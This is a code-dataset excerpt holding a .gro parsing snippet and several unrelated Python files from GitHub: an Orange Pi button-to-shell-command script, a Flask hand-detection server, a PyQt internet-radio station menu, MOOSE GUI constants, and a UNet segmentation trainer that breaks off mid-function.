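fields = [(0, 5, int), (5, 9, str), (11, 15, str),
          (20, 28, float), (28, 36, float), (36, 44, float)]
tokens = [conv(line[a:b].strip()) for a, b, conv in fields]
xyz = [10.0 * v for v in tokens[3:]]  # .gro stores nm; the reader scales to Angstroms
print(tokens[:3], xyz)                # [1, 'SOL', 'OW'] and roughly [2.3, 6.28, 1.13]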
+{"seq_id":"71599734801","text":"#!/usr/bin/env python3\n\"\"\"This script lets you easily give commands to an orange pi by pressing the\nboard button. The commands you can give are easily configured in the \ncommands.txt file. The first line is the first command, the second line is the \nsecond command and so on.\nYou select the command by pressing the button for a certain amount of seconds.\nThe red led serves as an indicator of the time the button has been pressed and\nthus, the command selected so far.\nIf you press the button for less than one second, no command is executed. The \nled turns on while you press it to let you know the program is running.\nIf you press the button for more than a second the led will flicker each second\nto let you know which command are you giving:\n one flicker, command one\n two flickers, command two\n ... and so on\nAfter a command is given the red led will flash n times to confirm it's \nexecuting command n.\n\"\"\"\nimport time, os, sys, subprocess\n\nimport opibtn, opiled\n\nif not os.geteuid() == 0:\n sys.exit(\"Only root can run this script\")\n\n_start = None\n\n\ndef _down():\n global _start\n _start = time.time()\n opiled.blink(\"red\", [0.95, 0.05])\n\n\ndef _up():\n if not _start:\n return # No previous Down event\n pressed = time.time() - _start\n opiled.set_state(\"red\", 0)\n command = int(pressed // 1)\n print(f\"pressed for: {pressed:.2f}s command: {command}\")\n time.sleep(1)\n if command:\n # Confirm the command to execute\n opiled.blink(\"red\", [0.5, 0.5], command)\n time.sleep(command)\n with open(\"commands.txt\", \"r\") as coms:\n for num, line in enumerate(coms):\n if num == command - 1:\n print(f'executing command {command}: \"{line.strip()}\"')\n subprocess.run([line], shell=True)\n\nif __name__ == \"__main__\":\n try:\n opibtn.read_button(_down, _up)\n except KeyboardInterrupt:\n pass\n","repo_name":"diegorodriguezv/button_commands","sub_path":"button_commands.py","file_name":"button_commands.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3062751257","text":"import sys\nimport cntk\nimport cv2\nimport numpy as np\nfrom PIL import Image\nfrom flask import Flask\nfrom threading import Thread\n\napp = Flask(__name__)\n\n# define the model and label files\nMODEL_FILENAME = '../model.onnx'\nLABELS_FILENAME = '../labels.txt'\n\n# define global variables\nglobal cap\nglobal model\nglobal od_model\nglobal hand_x, hand_y\nglobal frame\nglobal predictions\n\n# define flask app call\n@app.route('/')\ndef get_raise():\n # define global frame\n global frame\n condition = False\n listOfHighest = []\n frameCounter = 0\n while frameCounter < 5:\n\n ret, frame = cap.read()\n\n predictionThreshold = 45\n image = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n predictions = od_model.predict_image(image)\n highest = 0\n if (len(predictions) > 0):\n for a in range(len(predictions)):\n if predictions[a].get('probability') > highest:\n highest = predictions[a].get('probability') * 100\n if (len(listOfHighest) >= 5):\n del (listOfHighest[0])\n listOfHighest.append(highest)\n else:\n listOfHighest.append(highest)\n frameCounter+=1\n averageHighestPrediction = (sum(listOfHighest)) / len(listOfHighest)\n\n print(\"Current average: \", averageHighestPrediction)\n\n print(predictions)\n endResult = \"0\"\n print(averageHighestPrediction, predictionThreshold)\n if float(averageHighestPrediction) > float(predictionThreshold):\n endResult = \"1\"\n print(endResult)\n return endResult\n else:\n endResult = \"0\"\n print(endResult)\n return endResult\n\n@app.route('/deep')\ndef get_raiseFull():\n global frame\n condition = False\n listOfHighest = []\n frameCounter = 0\n\n while frameCounter < 3:\n\n ret, frame = cap.read()\n\n predictionThreshold = 30\n image = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n predictionsMain = od_model.predict_image(image)\n highest = 0\n if (len(predictionsMain) > 0):\n for a in range(len(predictionsMain)):\n if predictionsMain[a].get('probability') > highest:\n highest = predictionsMain[a].get('probability') * 100\n if (len(listOfHighest) >= 5):\n del (listOfHighest[0])\n listOfHighest.append(highest)\n else:\n listOfHighest.append(highest)\n frameCounter+=1\n\n # calculate the highest prediction (average across frames)\n averageHighestPrediction = (sum(listOfHighest)) / len(listOfHighest)\n\n # print out calculated data\n print(\"Current average: \", averageHighestPrediction)\n print(predictionsMain)\n print(averageHighestPrediction, predictionThreshold)\n\n # if the average high prediction is higher/lower than our defined threshold,\n # return an indication to the mobile phone\n if float(averageHighestPrediction) > float(predictionThreshold):\n # REST backend input\n endResult = str(predictionsMain)\n print(endResult)\n return endResult\n else:\n # REST backend input\n endResult ='0'\n print(endResult)\n return endResult\n\nclass ObjectDetection(object):\n \"\"\"Class for Custom Vision's exported object detection model\n \"\"\"\n\n ANCHORS = np.array([[0.573, 0.677], [1.87, 2.06], [3.34, 5.47], [7.88, 3.53], [9.77, 9.17]])\n IOU_THRESHOLD = 0.45\n\n def __init__(self, labels, prob_threshold=0.10, max_detections=20):\n \"\"\"Initialize the class\n\n Args:\n labels ([str]): list of labels for the exported model.\n prob_threshold (float): threshold for class probability.\n max_detections (int): the max number of output results.\n \"\"\"\n\n assert len(labels) >= 1, \"At least 1 label is required\"\n\n self.labels = labels\n self.prob_threshold = prob_threshold\n self.max_detections = 
max_detections\n\n def _logistic(self, x):\n return np.where(x > 0, 1 / (1 + np.exp(-x)), np.exp(x) / (1 + np.exp(x)))\n\n # non-maximum suppression: keep the best boxes, drop the ones that overlap them\n def _non_maximum_suppression(self, boxes, class_probs, max_detections):\n \"\"\"Remove overlapping bounding boxes\n \"\"\"\n assert len(boxes) == len(class_probs)\n\n max_detections = min(max_detections, len(boxes))\n max_probs = np.amax(class_probs, axis=1)\n max_classes = np.argmax(class_probs, axis=1)\n\n areas = boxes[:, 2] * boxes[:, 3]\n\n selected_boxes = []\n selected_classes = []\n selected_probs = []\n\n while len(selected_boxes) < max_detections:\n # Select the prediction with the highest probability.\n i = np.argmax(max_probs)\n if max_probs[i] < self.prob_threshold:\n break\n\n # Save the selected prediction\n selected_boxes.append(boxes[i])\n selected_classes.append(max_classes[i])\n selected_probs.append(max_probs[i])\n\n box = boxes[i]\n other_indices = np.concatenate((np.arange(i), np.arange(i + 1, len(boxes))))\n other_boxes = boxes[other_indices]\n\n # Get overlap between the 'box' and 'other_boxes'\n x1 = np.maximum(box[0], other_boxes[:, 0])\n y1 = np.maximum(box[1], other_boxes[:, 1])\n x2 = np.minimum(box[0] + box[2], other_boxes[:, 0] + other_boxes[:, 2])\n y2 = np.minimum(box[1] + box[3], other_boxes[:, 1] + other_boxes[:, 3])\n w = np.maximum(0, x2 - x1)\n h = np.maximum(0, y2 - y1)\n\n # Calculate Intersection Over Union (IOU)\n overlap_area = w * h\n iou = overlap_area / (areas[i] + areas[other_indices] - overlap_area)\n\n # Find the overlapping predictions\n overlapping_indices = other_indices[np.where(iou > self.IOU_THRESHOLD)[0]]\n overlapping_indices = np.append(overlapping_indices, i)\n\n # Set the probability of overlapping predictions to zero, and update max_probs and max_classes.\n class_probs[overlapping_indices, max_classes[i]] = 0\n max_probs[overlapping_indices] = np.amax(class_probs[overlapping_indices], axis=1)\n max_classes[overlapping_indices] = np.argmax(class_probs[overlapping_indices], axis=1)\n\n assert len(selected_boxes) == len(selected_classes) and len(selected_boxes) == len(selected_probs)\n return selected_boxes, selected_classes, selected_probs\n\n def _extract_bb(self, prediction_output, anchors):\n assert len(prediction_output.shape) == 3\n num_anchor = anchors.shape[0]\n height, width, channels = prediction_output.shape\n assert channels % num_anchor == 0\n\n num_class = int(channels / num_anchor) - 5\n assert num_class == len(self.labels)\n\n outputs = prediction_output.reshape((height, width, num_anchor, -1))\n\n # Extract bounding box information\n x = (self._logistic(outputs[..., 0]) + np.arange(width)[np.newaxis, :, np.newaxis]) / width\n y = (self._logistic(outputs[..., 1]) + np.arange(height)[:, np.newaxis, np.newaxis]) / height\n w = np.exp(outputs[..., 2]) * anchors[:, 0][np.newaxis, np.newaxis, :] / width\n h = np.exp(outputs[..., 3]) * anchors[:, 1][np.newaxis, np.newaxis, :] / height\n\n # (x,y) in the network outputs is the center of the bounding box. 
Convert them to top-left.\n x = x - w / 2\n y = y - h / 2\n boxes = np.stack((x, y, w, h), axis=-1).reshape(-1, 4)\n\n # Get confidence for the bounding boxes.\n objectness = self._logistic(outputs[..., 4])\n\n # Get class probabilities for the bounding boxes.\n class_probs = outputs[..., 5:]\n class_probs = np.exp(class_probs - np.amax(class_probs, axis=3)[..., np.newaxis])\n class_probs = class_probs / np.sum(class_probs, axis=3)[..., np.newaxis] * objectness[..., np.newaxis]\n class_probs = class_probs.reshape(-1, num_class)\n\n assert len(boxes) == len(class_probs)\n return (boxes, class_probs)\n\n def predict_image(self, image):\n inputs = self.preprocess(image)\n prediction_outputs = self.predict(inputs)\n return self.postprocess(prediction_outputs)\n\n def preprocess(self, image):\n image = image.convert(\"RGB\") if image.mode != \"RGB\" else image\n image = image.resize((416, 416))\n return image\n\n def predict(self, preprocessed_inputs):\n \"\"\"Evaluate the model and get the output\n\n Needs to be implemented for each platform, i.e. TensorFlow, CoreML, etc.\n \"\"\"\n raise NotImplementedError\n\n def postprocess(self, prediction_outputs):\n \"\"\" Extract bounding boxes from the model outputs.\n\n Args:\n prediction_outputs: Output from the object detection model. (H x W x C)\n\n Returns:\n List of Prediction objects.\n \"\"\"\n boxes, class_probs = self._extract_bb(prediction_outputs, self.ANCHORS)\n\n # Remove bounding boxes whose confidence is lower than the threshold.\n max_probs = np.amax(class_probs, axis=1)\n index, = np.where(max_probs > self.prob_threshold)\n index = index[(-max_probs[index]).argsort()]\n\n # Remove overlapping bounding boxes\n selected_boxes, selected_classes, selected_probs = self._non_maximum_suppression(boxes[index],\n class_probs[index],\n self.max_detections)\n\n return [{'probability': round(float(selected_probs[i]), 8),\n 'tagId': int(selected_classes[i]),\n 'tagName': self.labels[selected_classes[i]],\n 'boundingBox': {\n 'left': round(float(selected_boxes[i][0]), 8),\n 'top': round(float(selected_boxes[i][1]), 8),\n 'width': round(float(selected_boxes[i][2]), 8),\n 'height': round(float(selected_boxes[i][3]), 8)\n }\n } for i in range(len(selected_boxes))]\n\n# Detect objects using CNTK\nclass CNTKObjectDetection(ObjectDetection):\n \"\"\"Object Detection class for CNTK\n \"\"\"\n def __init__(self, model, labels):\n super(CNTKObjectDetection, self).__init__(labels)\n self.model = model\n \n def predict(self, preprocessed_image):\n inputs = np.array(preprocessed_image, dtype=np.float32)[:,:,(2,1,0)] # RGB -> BGR\n inputs = np.ascontiguousarray(np.rollaxis(inputs, 2))\n\n outputs = self.model.eval({self.model.arguments[0]: [inputs]})\n return np.squeeze(outputs).transpose((1,2,0))\n\n\ndef main():\n # globalize variables\n global cap, model, od_model, frame\n # open the main video capture\n cap = cv2.VideoCapture(0)\n # read in the first frame of video\n ret, frame = cap.read()\n # define the neural network's trained model, load it in\n model = cntk.Function.load(MODEL_FILENAME, format=cntk.ModelFormat.ONNX)\n\n # Load labels\n with open(LABELS_FILENAME, 'r') as f:\n labels = [l.strip() for l in f.readlines()]\n\n od_model = CNTKObjectDetection(model, labels)\n\n# show the image to the user\ndef showImage():\n # define the globals\n global od_model, cap, frame, predictions\n\n # loop until program ends\n while True:\n\n # read in the image, frame by frame\n ret, myframe = cap.read()\n # display the image\n cv2.imshow(\"Frame\",myframe)\n # 
given an \"x\" input, end the program.\n givenKey = cv2.waitKey(50) # every one millisecond\n # program end clause\n if givenKey == ord('x'):\n cap.release()\n cv2.destroyAllWindows()\n sys.exit()\n# run the Flask server\ndef runApp():\n print(\"Server initiated!\")\n app.run(host='0.0.0.0',port=5000)\n\n# This is called immediately as the program starts\nif __name__ == '__main__':\n # initialize predictions\n predictions = []\n # run main() for further initialization\n main()\n # define and run the different threads for efficiency\n appThread = Thread(target=runApp)\n appThread.start()\n imageThread = Thread(target=showImage)\n imageThread.start()\n\n\n\n\n","repo_name":"SmitRao/UofT-Hacks-2019","sub_path":"handRecognition/python/ctnk2.py","file_name":"ctnk2.py","file_ext":"py","file_size_in_byte":12275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29388463157","text":"from PyQt5 import QtGui\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtGui import QIcon, QPixmap\n\nimport labelClickable\nimport stationDialog\nimport selectmenu\nimport json\nimport tunein\nimport urllib\nimport soma\nimport plparser\nimport platform\n\nselectXpos = 250\nnormalcolor = \"#b1b1b1\"\nhighlight = \"White\" \n\nclass SelectStation(QDialog):\n def __init__(self):\n super().__init__()\n self.menuActive = None\n self.selectStation = stationDialog.Ui_SelectDialog()\n self.selectStation.setupUi(self)\n self.setStyleSheet(\"QWidget#SelectDialog {background-image: url(Music-Record-Vinyl-800-480.jpg);}\")\n self.createLabel(15, 15, normalcolor, \"Back\", self.backButton_clicked)\n self.fav_label = self.createLabel(15, 65, highlight, \"Favorites\", self.favorites_clicked)\n self.pinguin_label = self.createLabel(15, 115, normalcolor, \"Pinguin\", self.pinguin_clicked)\n self.tuneIn_label = self.createLabel(15, 165, normalcolor,\"TuneIn\", self.tuneIn_clicked)\n self.somafm_label = self.createLabel(15, 215, normalcolor,\"SomaFm\", self.somafm_clicked)\n self.readFavorites()\n self.readPinguin()\n self.items = self.favorites\n self.tuneIn = tunein.openRadio()\n self.sMenu = selectmenu.selectMenu(self, self.items, 6, selectXpos, self.itemSelected)\n self.menu = \"Favorites\" \n self.playing_name = \"\"\n self.playing_url = \"\"\n self.playing_image = \"\"\n \n \n self.pow_button = self.createIconLabel(20, 415, normalcolor, \"\", self.powerButton_clicked)\n pixmap = QtGui.QPixmap(\"./artwork/power-48-48.png\")\n #self.pow_button.resize(50, 50)\n self.pow_button.setPixmap(pixmap.scaled(self.pow_button.size(), QtCore.Qt.IgnoreAspectRatio))\n \n self.favmin_button = self.createIconLabel(85, 414, normalcolor, \"\", self.deleteFavorite_clicked)\n pixmap = QtGui.QPixmap(\"./artwork/favorite-48-48_min.png\")\n #self.set_button.resize(50, 50)\n self.favmin_button.setPixmap(pixmap.scaled(self.favmin_button.size(), QtCore.Qt.IgnoreAspectRatio))\n \n self.favplus_button = self.createIconLabel(150, 414, normalcolor, \"\", self. 
addFavorite_clicked)\n pixmap = QtGui.QPixmap(\"./artwork/favorite-48-48_plus.png\")\n #self.fav_button.resize(50, 50)\n self.favplus_button.setPixmap(pixmap.scaled(self.favplus_button.size(), QtCore.Qt.IgnoreAspectRatio))\n \n \n def powerButton_clicked(self):\n self.radio.showClock()\n \n \n def readFavorites(self):\n try:\n with open(\"favorites.json\") as json_data:\n self.favorites = json.load(json_data)\n except Exception as msg:\n print(\"file problem:\" + str(msg))\n return \n\n def readPinguin(self):\n try:\n with open(\"pinguin.json\") as json_data:\n self.pinguin = json.load(json_data)\n except Exception as msg:\n print(\"file problem:\" + str(msg))\n return \n\n\n def writeFavorites(self):\n try:\n with open(\"favorites.json\", \"w\") as json_data:\n json.dump(self.favorites, json_data, indent=4)\n except Exception as msg:\n print(\"file problem:\" + str(msg))\n return \n\n\n def show(self):\n self.favorites_clicked()\n self.menuActive = \"left\"\n super().show()\n\n \n def itemSelected(self, item):\n if self.items[item].get(\"type\") == \"audio\":\n print(\"Item selected: \" + str(item))\n if self.menu == \"tuneIn\":\n url = self.tuneIn.getStreamUrl(self.items[item].get(\"url\")).splitlines()[0]\n else:\n url = self.items[item].get(\"url\")\n if (\".pls\" in url) or (\".m3u\" in url):\n try:\n req = urllib.request.urlopen(url)\n file = req.read()\n url = plparser.parse(filename=url, filedata=file).Tracks[0].File\n except Exception as msg:\n print(msg) \n self.playing_name = self.items[item].get(\"name\") \n self.playing_url = url\n self.playing_image = self.items[item].get(\"image\")\n if self.playing_image != None:\n self.radio.showPicture(self.playing_image)\n self.radio.playNew(url,self.playing_name)\n self.radio.showArtist(\"\")\n self.radio.showSong(\"\")\n self.radio.show() \n self.hide()\n else:\n self.items = self.tuneIn.getNextLayer(self.items[item].get(\"url\"))\n self.sMenu.setItems(self.items)\n if self.menuActive == \"right\":\n self.sMenu.highlight(0)\n \n \n \n def createLabel(self, x, y, color, text, connect):\n font = QtGui.QFont()\n font.setFamily(\"Droid Sans\")\n font.setPointSize(30)\n font.setBold(True)\n font.setWeight(75)\n label_hdl = labelClickable.QLabelClickable(self)\n label_hdl.setFont(font)\n label_hdl.setGeometry(x, y, 300, 50)\n label_hdl.setText(\"<font color='\" + color + \"'>\" + text + \"</font>\")\n if connect != None:\n label_hdl.clicked.connect(connect)\n return label_hdl \n \n def createIconLabel(self, x, y, color, text, connect):\n font = QtGui.QFont()\n font.setFamily(\"Droid Sans\")\n font.setPointSize(30)\n font.setBold(True)\n font.setWeight(75)\n label_hdl = labelClickable.QLabelClickable(self)\n label_hdl.setFont(font)\n label_hdl.setGeometry(x, y, 48, 48)\n label_hdl.setText(\"<font color='\" + color + \"'>\" + text + \"</font>\")\n if connect != None:\n label_hdl.clicked.connect(connect)\n return label_hdl \n \n \n \n def changeLabel(self, handle, color, text):\n handle.setText(\"<font color='\" + color + \"'>\" + text + \"</font>\")\n \n \n def showSelectStation(self, radio):\n self.items = self.favorites\n self.radio = radio\n self.sMenu.setItems(self.items)\n self.show()\n \n \n def hideSelectStation(self):\n self.menuActive = None\n #self.radio.show()\n self.hide()\n \n\n def backButton_clicked(self):\n self.menuActive = None\n self.radio.show()\n self.hide() \n\n\n def favorites_clicked(self):\n self.changeLabel(self.fav_label, highlight, \"Favorites\")\n self.changeLabel(self.pinguin_label, normalcolor, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, normalcolor, \"TuneIn\") \n self.changeLabel(self.somafm_label, normalcolor, \"SomaFm\") 
\n self.items = self.favorites\n self.menu = \"Favorites\"\n self.sMenu.setItems(self.items)\n \n \n def pinguin_clicked(self):\n self.changeLabel(self.fav_label, normalcolor, \"Favorites\")\n self.changeLabel(self.pinguin_label, highlight, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, normalcolor, \"TuneIn\") \n self.changeLabel(self.somafm_label, normalcolor, \"SomaFm\") \n self.items = self.pinguin\n self.menu = \"Pinguin\"\n self.sMenu.setItems(self.items)\n \n \n \n def tuneIn_clicked(self):\n self.changeLabel(self.fav_label, normalcolor, \"Favorites\") \n self.changeLabel(self.pinguin_label, normalcolor, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, highlight, \"TuneIn\") \n self.changeLabel(self.somafm_label, normalcolor, \"SomaFm\") \n self.items = self.tuneIn.getOverview()\n self.menu = \"tuneIn\"\n self.sMenu.setItems(self.items)\n \n \n def somafm_clicked(self):\n self.changeLabel(self.fav_label, normalcolor, \"Favorites\") \n self.changeLabel(self.pinguin_label, normalcolor, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, normalcolor, \"TuneIn\") \n self.changeLabel(self.somafm_label, highlight, \"SomaFm\")\n self.items = soma.get_stations()\n self.menu = \"Somafm\"\n self.sMenu.setItems(self.items)\n \n def addFavorite_clicked(self):\n for item in self.favorites:\n if (item.get(\"url\") == self.playing_url) or (self.playing_url == \"\"):\n return # already in playlist\n \n self.favorites.append({\"name\":self.playing_name, \n \"url\":self.playing_url,\n \"image\":self.playing_image,\n \"type\": \"audio\" }) \n self.writeFavorites()\n self.radio.show()\n self.hide() \n \n \n def deleteFavorite_clicked(self):\n for index in range(0, len(self.favorites)):\n item = self.favorites[index]\n if item.get(\"url\") == self.playing_url:\n self.favorites.pop(index)\n break # the remaining indices are stale after pop()\n self.writeFavorites()\n self.radio.show()\n self.hide() \n \n \n def remoteCommand(self, command):\n # send command to selectmenu\n self.sMenu.remoteCommand(command)\n \n # handle commands if this menu is active\n if (self.menuActive != None):\n if command == \"power\":\n self.radio.showClock()\n elif command == \"down\":\n self.remoteDown()\n elif command == \"up\":\n self.remoteUp()\n elif (command == \"ok\") or (command == \"right\"):\n self.remoteOK()\n elif (command == \"back\") or (command == \"left\"):\n self.menuActive = None\n self.radio.show()\n self.hide() \n \n \n def remoteDown(self):\n if self.menuActive == \"left\":\n if self.menu == \"Favorites\":\n self.pinguin_clicked()\n elif self.menu == \"Pinguin\":\n self.tuneIn_clicked() \n elif self.menu == \"tuneIn\": \n self.somafm_clicked()\n \n \n def remoteUp(self):\n if self.menuActive == \"left\":\n if self.menu == \"Pinguin\":\n self.favorites_clicked() \n elif self.menu == \"tuneIn\": \n self.pinguin_clicked()\n elif self.menu == \"Somafm\":\n self.tuneIn_clicked() \n \n \n def remoteOK(self):\n if self.menuActive == \"left\":\n self.menuActive = \"right\"\n self.sMenu.highlight(0)\n elif self.menuActive == \"right\":\n self.itemSelected(self.sMenu.getCurrentItem())\n \n \n \n \n \n","repo_name":"pruimpit/PyQtRadio","sub_path":"station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":10591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
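The favorites.json file read by readFavorites() in the record above is a JSON list whose entries carry exactly the keys written by addFavorite_clicked(); the example values here are hypothetical, only the key names come from the code:

favorites = [
    {
        "name": "Some Station",                # display name (hypothetical value)
        "url": "http://example.com/stream",    # direct stream URL (hypothetical value)
        "image": None,                         # optional artwork path or URL
        "type": "audio"                        # only "audio" entries are playable in itemSelected()
    }
]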
+{"seq_id":"3511357101","text":"INVALID \t\t\t\t= 6\n\nINTERIOR \t\t\t\t= 7\nBOUNDARY \t\t\t\t= 8\n\nSAME_OBJECT \t\t\t= 9\nOTHER_OBJECT \t\t\t= 10\nNO_OBJECT \t\t\t\t= 11\n\nRUBBERBAND_SELECTION \t= 12\nVALID \t\t\t\t\t= 13\n\nITEM \t\t\t\t\t= 0\nCONNECTOR\t\t\t\t= 1\nCONNECTION\t\t\t\t= 2\nEMPTY\t\t\t\t\t= 3\n\nCOMPARTMENT \t\t\t= 14\nCOMPARTMENT_BOUNDARY \t= 4\nCOMPARTMENT_INTERIOR \t= 5\n\nGROUP\t\t\t\t\t= 15\nGROUP_BOUNDARY \t\t\t= 16\nGROUP_INTERIOR \t\t= 17\n","repo_name":"BhallaLab/moose","sub_path":"moose-gui/plugins/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"}
+{"seq_id":"73157901521","text":"from __init__ import *\nimport unet_model\nimport dataset\nimport torch.nn as nn\nfrom skimage import measure\nimport datetime\nimport csv\n\n# 每一类对于loss的weight\nloss_weight = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\n\n\n\nclass Trainer():\n def __init__(self, dir_dict, args):\n self.args=args\n self.augment = args['augment']\n self.train_ratio = float(args['train_ratio'])\n self.shuffle = args['shuffle']\n self.n_classes = int(args['n_classes'])\n self.n_channels = int(args['in_channels'])\n self.learning_rate = float(args['learning_rate'])\n self.epochs = int(args['epochs'])\n self.momentum_factor = float(args['momentum_factor'])\n self.weight_decay = float(args['weight_decay'])\n self.grid_clip_by_value = float(args['grad_clip_by_value'])\n self.save = args['save']\n self.save_freq = int(args['save_freq'])\n self.confidence_threshold = float(args['confidence_threshold'])\n self.lr_decay_step = int(args['lr_decay_step'])\n self.dir_dict = dir_dict\n # to GPU\n self.cuda_gpu = torch.cuda.is_available()\n # load dataset\n self.bulid_dataset()\n # build model\n if self.cuda_gpu:\n self.model = unet_model.UNet(self.n_channels, self.n_classes).cuda()\n else:\n self.model = unet_model.UNet(self.n_channels, self.n_classes)\n # build optimizer\n self.build_optimiezer()\n\n\n\n\n def bulid_dataset(self):\n self.train_dataloader = dataset.get_train_dataloaders(self.dir_dict['train_image_dir'],self.dir_dict['train_box_dir'],batch_size= int(self.args['batch_size']), augment=self.augment, shuffle=self.shuffle, train_size=self.train_ratio)\n self.val_dataloader = dataset.get_Val_dataloaders(self.dir_dict['train_image_dir'],self.dir_dict['train_box_dir'],batch_size= int(self.args['batch_size']), shuffle=self.shuffle, train_size=self.train_ratio)\n\n def loss(self, output, label):\n if self.cuda_gpu:\n loss_function = nn.CrossEntropyLoss(weight=torch.tensor(loss_weight).float().cuda())\n else:\n loss_function = nn.CrossEntropyLoss(weight=torch.tensor(loss_weight).float())\n\n # output:(B,n,H,W) to (B,H,W,n)\n # label:(B,H,W) [0,3]\n # label 对应 output的通道 0->通道0 1->通道1 2->通道2 3->通道3\n # output 的通道0表示label=0的概率分布\n loss = loss_function(output, label)\n return loss\n\n\n def build_optimiezer(self):\n model = self.model\n parameters = model.parameters()\n self.optimizer = torch.optim.SGD(parameters, lr=self.learning_rate, momentum=self.momentum_factor, weight_decay=self.weight_decay)\n\n def train(self):\n self.model = self.model\n self.model.train()\n Map_result_file = self.dir_dict['result_dir'] + '/'+datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + '.csv'\n with open(Map_result_file,'w') as Map_result_file:\n Map_writer = csv.writer(Map_result_file)\n # Map_header = ['epoch','train_Map','train_loss','val_Map','val_loss']\n Map_header = ['epoch','train_loss','val_loss']\n Map_writer.writerow(Map_header)\n\n for i in range(1, self.epochs + 1):\\\n\n print('train epoch',i)\n train_csv_path, train_loss = self.train_epoch(i)\n print('epoch'+str(i)+'train'+str(train_loss))\n\n self.save_checkpoints(epoch=i)\n #train_Map = Map_metric.Map_eval(self.dir_dict['train_box_dir'],train_csv_path,self.n_classes)\n print('validate epoch',i)\n val_csv_path, val_loss=self.validate_epoch(i)\n print('epoch' + str(i) + 'validata' + str(val_loss))\n #val_Map = Map_metric.Map_eval(self.dir_dict['train_box_dir'],val_csv_path,self.n_classes)\n # write the train map and validate map to csv file\n Map_writer.writerow([i,train_loss,val_loss])\n\n\n def train_epoch(self,epoch):\n model, 
train_loader, optimizer = self.model, self.train_dataloader, self.optimizer\n model.train()\n losses = AverageMeter()\n self.adjust_learning_rate(epoch)\n csv_file_path = self.dir_dict['csv_dir'] + '/'+datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + '_train_' + str(\"%06d\" % epoch ) + '.csv'\n with open(csv_file_path,'w',newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_head = ['name','image_id','confidence','xmin','ymin','xmax','ymax']\n csv_writer.writerow(csv_head)\n\n for i, (image,label,image_ids) in enumerate(train_loader):\n # batch\n if self.cuda_gpu:\n image = image.cuda()\n label = label.cuda()\n output = model(image)\n else:\n image = image\n label = label\n output = model(image)\n loss = self.loss(output=output, label= label)\n output = output.cpu()\n losses.update(float(loss.data.item()), image.size(0))\n optimizer.zero_grad()\n loss.backward()\n\n for p in model.parameters():\n if p.grad is not None:\n p.grad.data.clamp_(-self.grid_clip_by_value, self.grid_clip_by_value)\n\n optimizer.step()\n if i % 100 == 0:\n print('finish training image',image_ids)\n self.write_det_csv(image_ids, csv_writer=csv_writer, output=output)\n\n # close the csv file to read the csv file\n csvfile.close()\n return csv_file_path, losses.avg\n\n\n\n\n def save_checkpoints(self, epoch):\n model = self.model\n if self.save and epoch % self.save_freq == 0 :\n torch.save(self.model.state_dict(), self.dir_dict['save_dir'] + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + str(\"%06d\" % epoch) +'.pth')\n elif epoch == self.epochs:\n torch.save(model.state_dict(), self.dir_dict['save_dir'] + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + str(\"%06d\" % epoch) +'.pth')\n\n\n\n\n def get_confidence(self,class_i_image,bbox):\n confidences = []\n mask = class_i_image[bbox[0]:bbox[2],bbox[1]:bbox[3]]\n # take the highest pixel confidence inside the box as the final confidence\n confidence = np.max(np.max(mask))\n return confidence\n\n def validate_epoch(self, epoch):\n val_loader, model = self.val_dataloader, self.model\n model.eval()\n losses = AverageMeter()\n # detection result\n csv_file_path = self.dir_dict['csv_dir'] +'/'+ datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + \\\n '_val_' + str(\"%06d\" % epoch) + '.csv'\n with open(csv_file_path,'w') as CSVfile:\n csv_writer = csv.writer(CSVfile)\n csv_head = ['name', 'image_id', 'confidence', 'xmin', 'ymin', 'xmax', 'ymax']\n csv_writer.writerow(csv_head)\n for i,(image,label,image_ids) in enumerate(val_loader):\n if self.cuda_gpu:\n image = image.cuda()\n label = label.cuda()\n output = model(image)\n else:\n image = image\n label = label\n output = model(image)\n loss = self.loss(output,label)\n output = output.cpu()\n losses.update(float(loss.data.item()),image.size(0))\n if i % 100 == 0:\n print('finish validating image',image_ids)\n self.write_det_csv(image_ids, csv_writer=csv_writer, output= output)\n CSVfile.close()\n\n return csv_file_path, losses.avg\n\n\n\n\n\n\n def write_det_csv(self,image_ids,csv_writer,output):\n for b in range(list(image_ids.size())[0]):\n # process one sample from the batch\n image_id = image_ids[b].numpy()\n output_b = output[b, :, :, :]\n for j in range(1, self.n_classes):\n # process a single channel (class) of the sample\n class_j_image = output_b[j, :, :]\n csv_content = self.get_bbox(class_j_image, j, image_id,csv_writer=csv_writer)\n\n\n def get_bbox(self, class_i_image, class_i, image_id,csv_writer):\n\n csv_content = []\n\n class_i_image_numpy = class_i_image.detach().numpy()\n binary_image = np.where(class_i_image_numpy >= self.confidence_threshold, 1, 
